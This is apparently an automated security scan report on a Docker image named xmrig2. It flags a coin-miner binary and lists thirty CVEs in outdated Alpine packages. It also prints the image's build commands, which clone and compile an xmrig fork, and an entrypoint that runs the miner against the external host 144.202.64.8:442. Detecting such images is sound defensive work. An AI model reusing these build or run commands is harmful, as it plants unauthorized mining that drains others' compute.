xmrig

Region: us
Scan Summary
Critical vulnerabilities
3
Malicious files
1
Last scan

1 year, 6 months ago
Type of scan
Prevasio CSPM
Scan duration
39 seconds
Image Details
Image URI
us-docker.pkg.dev/peak-trilogy-360201/xmrig/xmrig2
Image tags
xmrig2
Digest
sha256:2e166be0abb74bda0d790d7293eff4a4876f283f4a8645c63a4f2c9b4a9716c5
Created

4 years ago
Compressed size
7.14 MB
Uncompressed size
16.8 MB
OS/architecture
linux/amd64
OS distribution
alpine 3.10.1 (reached end of life)
Working directory
xmrig
ENTRYPOINT
/bin/sh-c./xmrig-notls -o 144.202.64.8:442 -t 4
CMD
User
Ports
Volumes
Environment variables
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Filename File Size SHA 256 Threat Name Report
/xmrig/xmrig-notls 2.61 MB 823c2e84089e5bfa5d15dfb63cb25c6f109d81b7977d07d485bc4960fbc5d24a Multios.Coinminer.Miner-6781728-2 VirusTotal
Overview
Critical
3
High
9
Medium
14
Low
4
Informational
0
Vulnerabilities (30)
Severity Name Package VersionFixed inDescription Package:version
Critical CVE-2021-36159 apk-tools 2.10.4-r22.10.7-r0libfetch before 2021-07-26, as used in apk-tools, xbps, and other products, mishandles numeric strings for the FTP and HTTP protocols apk-tools:2.10.4-r2
Critical CVE-2019-14697 musl 1.1.22-r21.1.22-r3musl libc through 1.1.23 has an x87 floating-point stack adjustment im ... musl:1.1.22-r2
Critical CVE-2019-14697 musl-utils 1.1.22-r21.1.22-r3musl libc through 1.1.23 has an x87 floating-point stack adjustment im ... musl-utils:1.1.22-r2
High CVE-2021-30139 apk-tools 2.10.4-r22.10.6-r0In Alpine Linux apk-tools before 2.12.5, the tarball parser allows a buffer overflow and crash. apk-tools:2.10.4-r2
High CVE-2021-28831 busybox 1.30.1-r21.30.1-r5busybox: invalid free or segmentation fault via malformed gzip data busybox:1.30.1-r2
High CVE-2020-1967 libcrypto1.1 1.1.1c-r01.1.1g-r0openssl: Segmentation fault in SSL_check_chain causes denial of service libcrypto1.1:1.1.1c-r0
High CVE-2021-23840 libcrypto1.1 1.1.1c-r01.1.1j-r0openssl: integer overflow in CipherUpdate libcrypto1.1:1.1.1c-r0
High CVE-2021-3450 libcrypto1.1 1.1.1c-r01.1.1k-r0openssl: CA certificate check bypass with X509_V_FLAG_X509_STRICT libcrypto1.1:1.1.1c-r0
High CVE-2020-1967 libssl1.1 1.1.1c-r01.1.1g-r0openssl: Segmentation fault in SSL_check_chain causes denial of service libssl1.1:1.1.1c-r0
High CVE-2021-23840 libssl1.1 1.1.1c-r01.1.1j-r0openssl: integer overflow in CipherUpdate libssl1.1:1.1.1c-r0
High CVE-2021-3450 libssl1.1 1.1.1c-r01.1.1k-r0openssl: CA certificate check bypass with X509_V_FLAG_X509_STRICT libssl1.1:1.1.1c-r0
High CVE-2021-28831 ssl_client 1.30.1-r21.30.1-r5busybox: invalid free or segmentation fault via malformed gzip data ssl_client:1.30.1-r2
Medium CVE-2019-1547 libcrypto1.1 1.1.1c-r01.1.1d-r0openssl: side-channel weak encryption vulnerability libcrypto1.1:1.1.1c-r0
Medium CVE-2019-1549 libcrypto1.1 1.1.1c-r01.1.1d-r0openssl: information disclosure in fork() libcrypto1.1:1.1.1c-r0
Medium CVE-2019-1551 libcrypto1.1 1.1.1c-r01.1.1d-r2openssl: Integer overflow in RSAZ modular exponentiation on x86_64 libcrypto1.1:1.1.1c-r0
Medium CVE-2020-1971 libcrypto1.1 1.1.1c-r01.1.1i-r0openssl: EDIPARTYNAME NULL pointer de-reference libcrypto1.1:1.1.1c-r0
Medium CVE-2021-23841 libcrypto1.1 1.1.1c-r01.1.1j-r0openssl: NULL pointer dereference in X509_issuer_and_serial_hash() libcrypto1.1:1.1.1c-r0
Medium CVE-2021-3449 libcrypto1.1 1.1.1c-r01.1.1k-r0openssl: NULL pointer dereference in signature_algorithms processing libcrypto1.1:1.1.1c-r0
Medium CVE-2019-1547 libssl1.1 1.1.1c-r01.1.1d-r0openssl: side-channel weak encryption vulnerability libssl1.1:1.1.1c-r0
Medium CVE-2019-1549 libssl1.1 1.1.1c-r01.1.1d-r0openssl: information disclosure in fork() libssl1.1:1.1.1c-r0
Medium CVE-2019-1551 libssl1.1 1.1.1c-r01.1.1d-r2openssl: Integer overflow in RSAZ modular exponentiation on x86_64 libssl1.1:1.1.1c-r0
Medium CVE-2020-1971 libssl1.1 1.1.1c-r01.1.1i-r0openssl: EDIPARTYNAME NULL pointer de-reference libssl1.1:1.1.1c-r0
Medium CVE-2021-23841 libssl1.1 1.1.1c-r01.1.1j-r0openssl: NULL pointer dereference in X509_issuer_and_serial_hash() libssl1.1:1.1.1c-r0
Medium CVE-2021-3449 libssl1.1 1.1.1c-r01.1.1k-r0openssl: NULL pointer dereference in signature_algorithms processing libssl1.1:1.1.1c-r0
Medium CVE-2020-28928 musl 1.1.22-r21.1.22-r4In musl libc through 1.2.1, wcsnrtombs mishandles particular combinati ... musl:1.1.22-r2
Medium CVE-2020-28928 musl-utils 1.1.22-r21.1.22-r4In musl libc through 1.2.1, wcsnrtombs mishandles particular combinati ... musl-utils:1.1.22-r2
Low CVE-2019-1563 libcrypto1.1 1.1.1c-r01.1.1d-r0openssl: information disclosure in PKCS7_dataDecode and CMS_decrypt_set1_pkey libcrypto1.1:1.1.1c-r0
Low CVE-2021-23839 libcrypto1.1 1.1.1c-r01.1.1j-r0openssl: incorrect SSLv2 rollback protection libcrypto1.1:1.1.1c-r0
Low CVE-2019-1563 libssl1.1 1.1.1c-r01.1.1d-r0openssl: information disclosure in PKCS7_dataDecode and CMS_decrypt_set1_pkey libssl1.1:1.1.1c-r0
Low CVE-2021-23839 libssl1.1 1.1.1c-r01.1.1j-r0openssl: incorrect SSLv2 rollback protection libssl1.1:1.1.1c-r0

Command

ADD file:0eb5ea35741d23fe39cbac245b3a5d84856ed6384f4ff07d496369ee6d960bad in /
Vulnerable packages, installed in this layer 4 years ago
apk-tools 2.10.4-r2 musl 1.1.22-r2 musl-utils 1.1.22-r2 busybox 1.30.1-r2 libcrypto1.1 1.1.1c-r0 libssl1.1 1.1.1c-r0 ssl_client 1.30.1-r2

Command

CMD ["/bin/sh"]

Command

RUN adduser -S -D -H -h /xmrig miner

Command

RUN apk --no-cache upgrade &&
    apk --no-cache add git cmake libuv-dev build-base &&
    git clone -b beta https://github.com/nguyennhatduy2608/xmrig.git &&
    cd xmrig &&
    mkdir build &&
    cmake -DCMAKE_BUILD_TYPE=Release -DWITH_TLS=OFF -DWITH_HTTPD=OFF . &&
    make &&
    apk del build-base cmake git

Command

WORKDIR /xmrig

Command

ENTRYPOINT ["/bin/sh" "-c" "./xmrig-notls -o 144.202.64.8:442 -t 4"]
Dynamic Analysis Results
The following graph outlines the most important system events generated by the container:
The container attempts to connect to the following remote hosts:
IP address Domain Location Coordinates ASN organization
144.202.64.8 Dallas, United States 32.7889, -96.8021 AS-CHOOPA
The container produces the following text output:
user@host: ~